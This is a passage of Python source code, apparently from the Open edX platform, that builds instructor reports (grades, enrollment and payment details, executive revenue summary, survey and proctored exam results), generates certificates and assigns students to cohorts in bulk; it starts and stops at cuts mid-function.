return UPDATE_STATUS_SUCCEEDED
def upload_csv_to_report_store(rows, csv_name, course_id, timestamp, config_name='GRADES_DOWNLOAD'):
"""
Upload data as a CSV using ReportStore.
Arguments:
rows: CSV data in the following format (first column may be a
header):
[
[row1_colum1, row1_colum2, ...],
...
]
csv_name: Name of the resulting CSV
course_id: ID of the course
"""
report_store = ReportStore.from_config(config_name)
report_store.store_rows(
course_id,
u"{course_prefix}_{csv_name}_{timestamp_str}.csv".format(
course_prefix=course_filename_prefix_generator(course_id),
csv_name=csv_name,
timestamp_str=timestamp.strftime("%Y-%m-%d-%H%M")
),
rows
)
tracker.emit(REPORT_REQUESTED_EVENT_NAME, {"report_type": csv_name, })
def upload_exec_summary_to_store(data_dict, report_name, course_id, generated_at, config_name='FINANCIAL_REPORTS'):
"""
Upload Executive Summary Html file using ReportStore.
Arguments:
data_dict: containing executive report data.
report_name: Name of the resulting Html File.
course_id: ID of the course
"""
report_store = ReportStore.from_config(config_name)
# Use the data dict and html template to generate the output buffer
output_buffer = StringIO(render_to_string("instructor/instructor_dashboard_2/executive_summary.html", data_dict))
report_store.store(
course_id,
u"{course_prefix}_{report_name}_{timestamp_str}.html".format(
course_prefix=course_filename_prefix_generator(course_id),
report_name=report_name,
timestamp_str=generated_at.strftime("%Y-%m-%d-%H%M")
),
output_buffer,
)
tracker.emit(REPORT_REQUESTED_EVENT_NAME, {"report_type": report_name})
def upload_grades_csv(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name): # pylint: disable=too-many-statements
"""
For a given `course_id`, generate a grades CSV file for all students that
are enrolled, and store using a `ReportStore`. Once created, the files can
be accessed by instantiating another `ReportStore` (via
`ReportStore.from_config()`) and calling `link_for()` on it. Writes are
buffered, so we'll never write part of a CSV file to S3 -- i.e. any files
that are visible in ReportStore will be complete ones.
As we start to add more CSV downloads, it will probably be worthwhile to
make a more general CSVDoc class instead of building out the rows like we
do here.
"""
start_time = time()
start_date = datetime.now(UTC)
status_interval = 100
enrolled_students = CourseEnrollment.objects.users_enrolled_in(course_id)
task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(
task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
entry_id=_entry_id,
course_id=course_id,
task_input=_task_input
)
TASK_LOG.info(u'%s, Task type: %s, Starting task execution', task_info_string, action_name)
course = get_course_by_id(course_id)
course_is_cohorted = is_course_cohorted(course.id)
teams_enabled = course.teams_enabled
cohorts_header = ['Cohort Name'] if course_is_cohorted else []
teams_header = ['Team Name'] if teams_enabled else []
experiment_partitions = get_split_user_partitions(course.user_partitions)
group_configs_header = [u'Experiment Group ({})'.format(partition.name) for partition in experiment_partitions]
certificate_info_header = ['Certificate Eligible', 'Certificate Delivered', 'Certificate Type']
certificate_whitelist = CertificateWhitelist.objects.filter(course_id=course_id, whitelist=True)
whitelisted_user_ids = [entry.user_id for entry in certificate_whitelist]
# Loop over all our students and build our CSV lists in memory
header = None
rows = []
err_rows = [["id", "username", "error_msg"]]
current_step = {'step': 'Calculating Grades'}
total_enrolled_students = enrolled_students.count()
student_counter = 0
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, Starting grade calculation for total students: %s',
task_info_string,
action_name,
current_step,
total_enrolled_students
)
for student, gradeset, err_msg in iterate_grades_for(course_id, enrolled_students):
# Periodically update task status (this is a cache write)
if task_progress.attempted % status_interval == 0:
task_progress.update_task_state(extra_meta=current_step)
task_progress.attempted += 1
# Now add a log entry after each student is graded to get a sense
# of the task's progress
student_counter += 1
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, Grade calculation in-progress for students: %s/%s',
task_info_string,
action_name,
current_step,
student_counter,
total_enrolled_students
)
if gradeset:
# We were able to successfully grade this student for this course.
task_progress.succeeded += 1
if not header:
header = [section['label'] for section in gradeset[u'section_breakdown']]
rows.append(
["id", "email", "username", "grade"] + header + cohorts_header +
group_configs_header + teams_header +
['Enrollment Track', 'Verification Status'] + certificate_info_header
)
percents = {
section['label']: section.get('percent', 0.0)
for section in gradeset[u'section_breakdown']
if 'label' in section
}
cohorts_group_name = []
if course_is_cohorted:
group = get_cohort(student, course_id, assign=False)
cohorts_group_name.append(group.name if group else '')
group_configs_group_names = []
for partition in experiment_partitions:
group = LmsPartitionService(student, course_id).get_group(partition, assign=False)
group_configs_group_names.append(group.name if group else '')
team_name = []
if teams_enabled:
try:
membership = CourseTeamMembership.objects.get(user=student, team__course_id=course_id)
team_name.append(membership.team.name)
except CourseTeamMembership.DoesNotExist:
team_name.append('')
enrollment_mode = CourseEnrollment.enrollment_mode_for_user(student, course_id)[0]
verification_status = SoftwareSecurePhotoVerification.verification_status_for_user(
student,
course_id,
enrollment_mode
)
certificate_info = certificate_info_for_user(
student,
course_id,
gradeset['grade'],
student.id in whitelisted_user_ids
)
# Not everybody has the same gradable items. If the item is not
# found in the user's gradeset, just assume it's a 0. The aggregated
# grades for their sections and overall course will be calculated
# without regard for the item they didn't have access to, so it's
# possible for a student to have a 0.0 show up in their row but
# still have 100% for the course.
row_percents = [percents.get(label, 0.0) for label in header]
rows.append(
[student.id, student.email, student.username, gradeset['percent']] +
row_percents + cohorts_group_name + group_configs_group_names + team_name +
[enrollment_mode] + [verification_status] + certificate_info
)
else:
# An empty gradeset means we failed to grade a student.
task_progress.failed += 1
err_rows.append([student.id, student.username, err_msg])
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, Grade calculation completed for students: %s/%s',
task_info_string,
action_name,
current_step,
student_counter,
total_enrolled_students
)
# By this point, we've got the rows we're going to stuff into our CSV files.
current_step = {'step': 'Uploading CSVs'}
task_progress.update_task_state(extra_meta=current_step)
TASK_LOG.info(u'%s, Task type: %s, Current step: %s', task_info_string, action_name, current_step)
# Perform the actual upload
upload_csv_to_report_store(rows, 'grade_report', course_id, start_date)
# If there are any error rows (don't count the header), write them out as well
if len(err_rows) > 1:
upload_csv_to_report_store(err_rows, 'grade_report_err', course_id, start_date)
# One last update before we close out...
TASK_LOG.info(u'%s, Task type: %s, Finalizing grade task', task_info_string, action_name)
return task_progress.update_task_state(extra_meta=current_step)
def _order_problems(blocks):
"""
Sort the problems by the assignment type and assignment that it belongs to.
Args:
blocks (OrderedDict) - A course structure containing blocks that have been ordered
(i.e. when we iterate over them, we will see them in the order
that they appear in the course).
Returns:
an OrderedDict that maps a problem id to its headers in the final report.
"""
problems = OrderedDict()
assignments = OrderedDict()
# First, sort out all the blocks into their correct assignments and all the
# assignments into their correct types.
for block in blocks:
# Put the assignments in order into the assignments list.
if blocks[block]['block_type'] == 'sequential':
block_format = blocks[block]['format']
if block_format not in assignments:
assignments[block_format] = OrderedDict()
assignments[block_format][block] = list()
# Put the problems into the correct order within their assignment.
if blocks[block]['block_type'] == 'problem' and blocks[block]['graded'] is True:
current = blocks[block]['parent']
# crawl up the tree for the sequential block
while blocks[current]['block_type'] != 'sequential':
current = blocks[current]['parent']
current_format = blocks[current]['format']
assignments[current_format][current].append(block)
# Now that we have a sorting and an order for the assignments and problems,
# iterate through them in order to generate the header row.
for assignment_type in assignments:
for assignment_index, assignment in enumerate(assignments[assignment_type].keys(), start=1):
for problem in assignments[assignment_type][assignment]:
header_name = u"{assignment_type} {assignment_index}: {assignment_name} - {block}".format(
block=blocks[problem]['display_name'],
assignment_type=assignment_type,
assignment_index=assignment_index,
assignment_name=blocks[assignment]['display_name']
)
problems[problem] = [header_name + " (Earned)", header_name + " (Possible)"]
return problems
def upload_problem_responses_csv(_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
For a given `course_id`, generate a CSV file containing
all student answers to a given problem, and store using a `ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
num_reports = 1
task_progress = TaskProgress(action_name, num_reports, start_time)
current_step = {'step': 'Calculating students answers to problem'}
task_progress.update_task_state(extra_meta=current_step)
# Compute result table and format it
problem_location = task_input.get('problem_location')
student_data = list_problem_responses(course_id, problem_location)
features = ['username', 'state']
header, rows = format_dictlist(student_data, features)
task_progress.attempted = task_progress.succeeded = len(rows)
task_progress.skipped = task_progress.total - task_progress.attempted
rows.insert(0, header)
current_step = {'step': 'Uploading CSV'}
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload
problem_location = re.sub(r'[:/]', '_', problem_location)
csv_name = 'student_state_from_{}'.format(problem_location)
upload_csv_to_report_store(rows, csv_name, course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def upload_problem_grade_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
"""
Generate a CSV containing all students' problem grades within a given
`course_id`.
"""
start_time = time()
start_date = datetime.now(UTC)
status_interval = 100
enrolled_students = CourseEnrollment.objects.users_enrolled_in(course_id)
task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
# This struct encapsulates both the display names of each static item in the
# header row as values as well as the django User field names of those items
# as the keys. It is structured in this way to keep the values related.
header_row = OrderedDict([('id', 'Student ID'), ('email', 'Email'), ('username', 'Username')])
try:
course_structure = CourseStructure.objects.get(course_id=course_id)
blocks = course_structure.ordered_blocks
problems = _order_problems(blocks)
except CourseStructure.DoesNotExist:
return task_progress.update_task_state(
extra_meta={'step': 'Generating course structure. Please refresh and try again.'}
)
# Just generate the static fields for now.
rows = [list(header_row.values()) + ['Final Grade'] + list(chain.from_iterable(problems.values()))]
error_rows = [list(header_row.values()) + ['error_msg']]
current_step = {'step': 'Calculating Grades'}
for student, gradeset, err_msg in iterate_grades_for(course_id, enrolled_students, keep_raw_scores=True):
student_fields = [getattr(student, field_name) for field_name in header_row]
task_progress.attempted += 1
if 'percent' not in gradeset or 'raw_scores' not in gradeset:
# There was an error grading this student.
# Generally there will be a non-empty err_msg, but that is not always the case.
if not err_msg:
err_msg = u"Unknown error"
error_rows.append(student_fields + [err_msg])
task_progress.failed += 1
continue
final_grade = gradeset['percent']
# Only consider graded problems
problem_scores = {unicode(score.module_id): score for score in gradeset['raw_scores'] if score.graded}
earned_possible_values = list()
for problem_id in problems:
try:
problem_score = problem_scores[problem_id]
earned_possible_values.append([problem_score.earned, problem_score.possible])
except KeyError:
# The student has not been graded on this problem. For example,
# iterate_grades_for skips problems that students have never
# seen in order to speed up report generation. It could also be
# the case that the student does not have access to it (e.g. A/B
# test or cohorted courseware).
earned_possible_values.append(['N/A', 'N/A'])
rows.append(student_fields + [final_grade] + list(chain.from_iterable(earned_possible_values)))
task_progress.succeeded += 1
if task_progress.attempted % status_interval == 0:
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload if any students have been successfully graded
if len(rows) > 1:
upload_csv_to_report_store(rows, 'problem_grade_report', course_id, start_date)
# If there are any error rows, write them out as well
if len(error_rows) > 1:
upload_csv_to_report_store(error_rows, 'problem_grade_report_err', course_id, start_date)
return task_progress.update_task_state(extra_meta={'step': 'Uploading CSV'})
def upload_students_csv(_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
For a given `course_id`, generate a CSV file containing profile
information for all students that are enrolled, and store using a
`ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
enrolled_students = CourseEnrollment.objects.users_enrolled_in(course_id)
task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
current_step = {'step': 'Calculating Profile Info'}
task_progress.update_task_state(extra_meta=current_step)
# compute the student features table and format it
query_features = task_input
student_data = enrolled_students_features(course_id, query_features)
header, rows = format_dictlist(student_data, query_features)
task_progress.attempted = task_progress.succeeded = len(rows)
task_progress.skipped = task_progress.total - task_progress.attempted
rows.insert(0, header)
current_step = {'step': 'Uploading CSV'}
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload
upload_csv_to_report_store(rows, 'student_profile_info', course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def upload_enrollment_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
"""
For a given `course_id`, generate a CSV file containing profile
information for all students that are enrolled, and store using a
`ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
status_interval = 100
students_in_course = CourseEnrollment.objects.enrolled_and_dropped_out_users(course_id)
task_progress = TaskProgress(action_name, students_in_course.count(), start_time)
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(
task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
entry_id=_entry_id,
course_id=course_id,
task_input=_task_input
)
TASK_LOG.info(u'%s, Task type: %s, Starting task execution', task_info_string, action_name)
# Loop over all our students and build our CSV lists in memory
rows = []
header = None
current_step = {'step': 'Gathering Profile Information'}
enrollment_report_provider = PaidCourseEnrollmentReportProvider()
total_students = students_in_course.count()
student_counter = 0
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, generating detailed enrollment report for total students: %s',
task_info_string,
action_name,
current_step,
total_students
)
for student in students_in_course:
# Periodically update task status (this is a cache write)
if task_progress.attempted % status_interval == 0:
task_progress.update_task_state(extra_meta=current_step)
task_progress.attempted += 1
# Now add a log entry after certain intervals to get a hint that task is in progress
student_counter += 1
if student_counter % 100 == 0:
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, gathering enrollment profile for students in progress: %s/%s',
task_info_string,
action_name,
current_step,
student_counter,
total_students
)
user_data = enrollment_report_provider.get_user_profile(student.id)
course_enrollment_data = enrollment_report_provider.get_enrollment_info(student, course_id)
payment_data = enrollment_report_provider.get_payment_info(student, course_id)
# display name map for the column headers
enrollment_report_headers = {
'User ID': _('User ID'),
'Username': _('Username'),
'Full Name': _('Full Name'),
'First Name': _('First Name'),
'Last Name': _('Last Name'),
'Company Name': _('Company Name'),
'Title': _('Title'),
'Language': _('Language'),
'Year of Birth': _('Year of Birth'),
'Gender': _('Gender'),
'Level of Education': _('Level of Education'),
'Mailing Address': _('Mailing Address'),
'Goals': _('Goals'),
'City': _('City'),
'Country': _('Country'),
'Enrollment Date': _('Enrollment Date'),
'Currently Enrolled': _('Currently Enrolled'),
'Enrollment Source': _('Enrollment Source'),
'Manual (Un)Enrollment Reason': _('Manual (Un)Enrollment Reason'),
'Enrollment Role': _('Enrollment Role'),
'List Price': _('List Price'),
'Payment Amount': _('Payment Amount'),
'Coupon Codes Used': _('Coupon Codes Used'),
'Registration Code Used': _('Registration Code Used'),
'Payment Status': _('Payment Status'),
'Transaction Reference Number': _('Transaction Reference Number')
}
if not header:
header = user_data.keys() + course_enrollment_data.keys() + payment_data.keys()
display_headers = []
for header_element in header:
# translate header into a localizable display string
display_headers.append(enrollment_report_headers.get(header_element, header_element))
rows.append(display_headers)
rows.append(user_data.values() + course_enrollment_data.values() + payment_data.values())
task_progress.succeeded += 1
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, Detailed enrollment report generated for students: %s/%s',
task_info_string,
action_name,
current_step,
student_counter,
total_students
)
# By this point, we've got the rows we're going to stuff into our CSV files.
current_step = {'step': 'Uploading CSVs'}
task_progress.update_task_state(extra_meta=current_step)
TASK_LOG.info(u'%s, Task type: %s, Current step: %s', task_info_string, action_name, current_step)
# Perform the actual upload
upload_csv_to_report_store(rows, 'enrollment_report', course_id, start_date, config_name='FINANCIAL_REPORTS')
# One last update before we close out...
TASK_LOG.info(u'%s, Task type: %s, Finalizing detailed enrollment task', task_info_string, action_name)
return task_progress.update_task_state(extra_meta=current_step)
def upload_may_enroll_csv(_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
For a given `course_id`, generate a CSV file containing
information about students who may enroll but have not done so
yet, and store using a `ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
num_reports = 1
task_progress = TaskProgress(action_name, num_reports, start_time)
current_step = {'step': 'Calculating info about students who may enroll'}
task_progress.update_task_state(extra_meta=current_step)
# Compute result table and format it
query_features = task_input.get('features')
student_data = list_may_enroll(course_id, query_features)
header, rows = format_dictlist(student_data, query_features)
task_progress.attempted = task_progress.succeeded = len(rows)
task_progress.skipped = task_progress.total - task_progress.attempted
rows.insert(0, header)
current_step = {'step': 'Uploading CSV'}
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload
upload_csv_to_report_store(rows, 'may_enroll_info', course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def get_executive_report(course_id):
"""
Returns dict containing information about the course executive summary.
"""
single_purchase_total = PaidCourseRegistration.get_total_amount_of_purchased_item(course_id)
bulk_purchase_total = CourseRegCodeItem.get_total_amount_of_purchased_item(course_id)
paid_invoices_total = InvoiceTransaction.get_total_amount_of_paid_course_invoices(course_id)
gross_paid_revenue = single_purchase_total + bulk_purchase_total + paid_invoices_total
all_invoices_total = Invoice.get_invoice_total_amount_for_course(course_id)
gross_pending_revenue = all_invoices_total - float(paid_invoices_total)
gross_revenue = float(gross_paid_revenue) + float(gross_pending_revenue)
refunded_self_purchased_seats = PaidCourseRegistration.get_self_purchased_seat_count(
course_id, status='refunded'
)
refunded_bulk_purchased_seats = CourseRegCodeItem.get_bulk_purchased_seat_count(
course_id, status='refunded'
)
total_seats_refunded = refunded_self_purchased_seats + refunded_bulk_purchased_seats
self_purchased_refunds = PaidCourseRegistration.get_total_amount_of_purchased_item(
course_id,
status='refunded'
)
bulk_purchase_refunds = CourseRegCodeItem.get_total_amount_of_purchased_item(course_id, status='refunded')
total_amount_refunded = self_purchased_refunds + bulk_purchase_refunds
top_discounted_codes = CouponRedemption.get_top_discount_codes_used(course_id)
total_coupon_codes_purchases = CouponRedemption.get_total_coupon_code_purchases(course_id)
bulk_purchased_codes = CourseRegistrationCode.order_generated_registration_codes(course_id)
unused_registration_codes = 0
for registration_code in bulk_purchased_codes:
if not RegistrationCodeRedemption.is_registration_code_redeemed(registration_code.code):
unused_registration_codes += 1
self_purchased_seat_count = PaidCourseRegistration.get_self_purchased_seat_count(course_id)
bulk_purchased_seat_count = CourseRegCodeItem.get_bulk_purchased_seat_count(course_id)
total_invoiced_seats = CourseRegistrationCode.invoice_generated_registration_codes(course_id).count()
total_seats = self_purchased_seat_count + bulk_purchased_seat_count + total_invoiced_seats
self_purchases_percentage = 0.0
bulk_purchases_percentage = 0.0
invoice_purchases_percentage = 0.0
avg_price_paid = 0.0
if total_seats != 0:
self_purchases_percentage = (float(self_purchased_seat_count) / float(total_seats)) * 100
bulk_purchases_percentage = (float(bulk_purchased_seat_count) / float(total_seats)) * 100
invoice_purchases_percentage = (float(total_invoiced_seats) / float(total_seats)) * 100
avg_price_paid = gross_revenue / total_seats
course = get_course_by_id(course_id, depth=0)
currency = settings.PAID_COURSE_REGISTRATION_CURRENCY[1]
return {
'display_name': course.display_name,
'start_date': course.start.strftime("%Y-%m-%d") if course.start is not None else 'N/A',
'end_date': course.end.strftime("%Y-%m-%d") if course.end is not None else 'N/A',
'total_seats': total_seats,
'currency': currency,
'gross_revenue': float(gross_revenue),
'gross_paid_revenue': float(gross_paid_revenue),
'gross_pending_revenue': gross_pending_revenue,
'total_seats_refunded': total_seats_refunded,
'total_amount_refunded': float(total_amount_refunded),
'average_paid_price': float(avg_price_paid),
'discount_codes_data': top_discounted_codes,
'total_seats_using_discount_codes': total_coupon_codes_purchases,
'total_self_purchase_seats': self_purchased_seat_count,
'total_bulk_purchase_seats': bulk_purchased_seat_count,
'total_invoiced_seats': total_invoiced_seats,
'unused_bulk_purchase_code_count': unused_registration_codes,
'self_purchases_percentage': self_purchases_percentage,
'bulk_purchases_percentage': bulk_purchases_percentage,
'invoice_purchases_percentage': invoice_purchases_percentage,
}
def upload_exec_summary_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
"""
For a given `course_id`, generate a html report containing information,
which provides a snapshot of how the course is doing.
"""
start_time = time()
report_generation_date = datetime.now(UTC)
status_interval = 100
enrolled_users = CourseEnrollment.objects.users_enrolled_in(course_id)
true_enrollment_count = 0
for user in enrolled_users:
if not user.is_staff and not CourseAccessRole.objects.filter(
user=user, course_id=course_id, role__in=FILTERED_OUT_ROLES
).exists():
true_enrollment_count += 1
task_progress = TaskProgress(action_name, true_enrollment_count, start_time)
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(
task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
entry_id=_entry_id,
course_id=course_id,
task_input=_task_input
)
TASK_LOG.info(u'%s, Task type: %s, Starting task execution', task_info_string, action_name)
current_step = {'step': 'Gathering executive summary report information'}
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, generating executive summary report',
task_info_string,
action_name,
current_step
)
if task_progress.attempted % status_interval == 0:
task_progress.update_task_state(extra_meta=current_step)
task_progress.attempted += 1
# get the course executive summary report information.
data_dict = get_executive_report(course_id)
data_dict.update(
{
'total_enrollments': true_enrollment_count,
'report_generation_date': report_generation_date.strftime("%Y-%m-%d"),
}
)
# By this point, we've got the data that we need to generate html report.
current_step = {'step': 'Uploading executive summary report HTML file'}
task_progress.update_task_state(extra_meta=current_step)
TASK_LOG.info(u'%s, Task type: %s, Current step: %s', task_info_string, action_name, current_step)
# Perform the actual upload
upload_exec_summary_to_store(data_dict, 'executive_report', course_id, report_generation_date)
task_progress.succeeded += 1
# One last update before we close out...
TASK_LOG.info(u'%s, Task type: %s, Finalizing executive summary report task', task_info_string, action_name)
return task_progress.update_task_state(extra_meta=current_step)
def upload_course_survey_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
"""
For a given `course_id`, generate a html report containing the survey results for a course.
"""
start_time = time()
start_date = datetime.now(UTC)
num_reports = 1
task_progress = TaskProgress(action_name, num_reports, start_time)
current_step = {'step': 'Gathering course survey report information'}
task_progress.update_task_state(extra_meta=current_step)
distinct_survey_fields_queryset = SurveyAnswer.objects.filter(course_key=course_id).values('field_name').distinct()
survey_fields = []
for unique_field_row in distinct_survey_fields_queryset:
survey_fields.append(unique_field_row['field_name'])
survey_fields.sort()
user_survey_answers = OrderedDict()
survey_answers_for_course = SurveyAnswer.objects.filter(course_key=course_id).select_related('user')
for survey_field_record in survey_answers_for_course:
user_id = survey_field_record.user.id
if user_id not in user_survey_answers.keys():
user_survey_answers[user_id] = {
'username': survey_field_record.user.username,
'email': survey_field_record.user.email
}
user_survey_answers[user_id][survey_field_record.field_name] = survey_field_record.field_value
header = ["User ID", "User Name", "Email"]
header.extend(survey_fields)
csv_rows = []
for user_id in user_survey_answers.keys():
row = []
row.append(user_id)
row.append(user_survey_answers[user_id].get('username', ''))
row.append(user_survey_answers[user_id].get('email', ''))
for survey_field in survey_fields:
row.append(user_survey_answers[user_id].get(survey_field, ''))
csv_rows.append(row)
task_progress.attempted = task_progress.succeeded = len(csv_rows)
task_progress.skipped = task_progress.total - task_progress.attempted
csv_rows.insert(0, header)
current_step = {'step': 'Uploading CSV'}
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload
upload_csv_to_report_store(csv_rows, 'course_survey_results', course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def upload_proctored_exam_results_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name): # pylint: disable=invalid-name
"""
For a given `course_id`, generate a CSV file containing
information about proctored exam results, and store using a `ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
num_reports = 1
task_progress = TaskProgress(action_name, num_reports, start_time)
current_step = {'step': 'Calculating info about proctored exam results in a course'}
task_progress.update_task_state(extra_meta=current_step)
# Compute result table and format it
query_features = _task_input.get('features')
student_data = get_proctored_exam_results(course_id, query_features)
header, rows = format_dictlist(student_data, query_features)
task_progress.attempted = task_progress.succeeded = len(rows)
task_progress.skipped = task_progress.total - task_progress.attempted
rows.insert(0, header)
current_step = {'step': 'Uploading CSV'}
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload
upload_csv_to_report_store(rows, 'proctored_exam_results_report', course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def generate_students_certificates(
_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
For a given `course_id`, generate certificates for only students present in 'students' key in task_input
json column, otherwise generate certificates for all enrolled students.
"""
start_time = time()
students_to_generate_certs_for = CourseEnrollment.objects.users_enrolled_in(course_id)
student_set = task_input.get('student_set')
if student_set == 'all_whitelisted':
# Generate Certificates for all white listed students.
students_to_generate_certs_for = students_to_generate_certs_for.filter(
certificatewhitelist__course_id=course_id,
certificatewhitelist__whitelist=True
)
elif student_set == 'whitelisted_not_generated':
# Whitelist students who did not get certificates already.
students_to_generate_certs_for = students_to_generate_certs_for.filter(
certificatewhitelist__course_id=course_id,
certificatewhitelist__whitelist=True
).exclude(
generatedcertificate__course_id=course_id,
generatedcertificate__status__in=CertificateStatuses.PASSED_STATUSES
)
elif student_set == "specific_student":
specific_student_id = task_input.get('specific_student_id')
students_to_generate_certs_for = students_to_generate_certs_for.filter(id=specific_student_id)
task_progress = TaskProgress(action_name, students_to_generate_certs_for.count(), start_time)
current_step = {'step': 'Calculating students already have certificates'}
task_progress.update_task_state(extra_meta=current_step)
statuses_to_regenerate = task_input.get('statuses_to_regenerate', [])
if student_set is not None and not statuses_to_regenerate:
# We want to skip 'filtering students' only when students are given and statuses to regenerate are not
students_require_certs = students_to_generate_certs_for
else:
students_require_certs = students_require_certificate(
course_id, students_to_generate_certs_for, statuses_to_regenerate
)
if statuses_to_regenerate:
# Mark existing generated certificates as 'unavailable' before regenerating
# We need to call this method after "students_require_certificate" otherwise "students_require_certificate"
# would return no results.
invalidate_generated_certificates(course_id, students_to_generate_certs_for, statuses_to_regenerate)
task_progress.skipped = task_progress.total - len(students_require_certs)
current_step = {'step': 'Generating Certificates'}
task_progress.update_task_state(extra_meta=current_step)
course = modulestore().get_course(course_id, depth=0)
# Generate certificate for each student
for student in students_require_certs:
task_progress.attempted += 1
status = generate_user_certificates(
student,
course_id,
course=course
)
if CertificateStatuses.is_passing_status(status):
task_progress.succeeded += 1
else:
task_progress.failed += 1
return task_progress.update_task_state(extra_meta=current_step)
def cohort_students_and_upload(_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
Within a given course, cohort students in bulk, then upload the results
using a `ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
# Iterate through rows to get total assignments for task progress
with DefaultStorage().open(task_input['file_name']) as f:
total_assignments = 0
for _line in unicodecsv.DictReader(UniversalNewlineIterator(f)):
total_assignments += 1
task_progress = TaskProgress(action_name, total_assignments, start_time)
current_step = {'step': 'Cohorting Students'}
task_progress.update_task_state(extra_meta=current_step)
# cohorts_status is a mapping from cohort_name to metadata about
# that cohort. The metadata will include information about users
# successfully added to the cohort, users not found, and a cached
# reference to the corresponding cohort object to prevent
# redundant cohort queries.
cohorts_status = {}
with DefaultStorage().open(task_input['file_name']) as f:
for row in unicodecsv.DictReader(UniversalNewlineIterator(f), encoding='utf-8'):
# Try to use the 'email' field to identify the user. If it's not present, use 'username'.
username_or_email = row.get('email') or row.get('username')
cohort_name = row.get('cohort') or ''
task_progress.attempted += 1
if not cohorts_status.get(cohort_name):
cohorts_status[cohort_name] = {
'Cohort Name': cohort_name,
'Students Added': 0,
'Students Not Found': set()
}
try:
cohorts_status[cohort_name]['cohort'] = CourseUserGroup.objects.get(
course_id=course_id,
group_type=CourseUserGroup.COHORT,
name=cohort_name
)
cohorts_status[cohort_name]["Exists"] = True
except CourseUserGroup.DoesNotExist:
cohorts_status[cohort_name]["Exists"] = False
if not cohorts_status[cohort_name]['Exists']:
task_progress.failed += 1
continue
try:
add_user_to_cohort(cohorts_status[cohort_name]['cohort'], username_or_email)
cohorts_status[cohort_name]['Students Added'] += 1
task_progress.succeeded += 1
except User.DoesNotExist:
cohorts_status[cohort_name]['Students Not Found'].add(username_or_email)
task_progress.failed += 1
except ValueError:
# Raised when the user is already in the given cohort
task_progress.skipped += 1
task_progress.update_task_state(extra_meta=current_step)
current_step['step'] = 'Uploading CSV'
task_progress.update_task_state(extra_meta=current_step)
# Filter the output of `add_users_to_cohorts` in order to upload the result.
output_header = ['Cohort Name', 'Exists', 'Students Added', 'Students Not Found']
output_rows = [
[
','.join(status_dict.get(column_name, '')) if column_name == 'Students Not Found'
else status_dict[column_name]
for column_name in output_header
]
for _cohort_name, status_dict in cohorts_status.iteritems()
]
output_rows.insert(0, output_header)
upload_csv_to_report_store(output_rows, 'cohort_results', course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def students_require_certificate(course_id, enrolled_students, statuses_to_regenerate=None):
"""
Returns list of students where certificates needs to be generated.
if 'statuses_to_regenerate' is given then return students that have Generated Certificates
and the generated certificate status lies in 'statuses_to_regenerate'
if 'statuses_to_regenerate' is not given then return all the enrolled student skipping the ones
whose certificates have already been generated.
:param course_id:
:param enrolled_students:
:param statuses_to_regenerate:
"""
if statuses_to_regenerate:
# Return Students that have Generated Certificates and the generated certificate status
# lies in 'statuses_to_regenerate'
students_require_certificates = enrolled_students.filter(
generatedcertificate__course_id=course_id,
generatedcertificate__status__in=statuses_to_regenerate
)
# Fetch results otherwise subsequent operations on table cause wrong data fetch
return list(students_require_certificates)
else:
# compute those students whose certificates are already generated
students_already_have_certs = User.objects.filter(
~Q(generatedcertificate__status=CertificateStatuses.unavailable),
generatedcertificate__course_id=course_id)
# Return all the enrolled student skipping the ones whose certificates have already been generated
return list(set(enrolled_students) - set(students_already_have_certs))
def invalidate_generated_certificates(course_id, enrolled_students, certificate_statuses): # pylint: disable=invalid-name
"""
Invalidate generated certificates for all enrolled students in the given course having status in
'certificate_statuses'.
Generated Certificates are invalidated by marking its status 'unavailable' and updating verify_uuid, download_uuid,
download_url and grade with empty string.
:param course_id: Course Key for the course whose generated certificates need to be removed
:param enrolled_students: (queryset or list) students enrolled in the course
:param certificate_statuses: certificates statuses for whom to remove generated certificate
"""
certificates = GeneratedCertificate.objects.filter( # pylint: disable=no-member
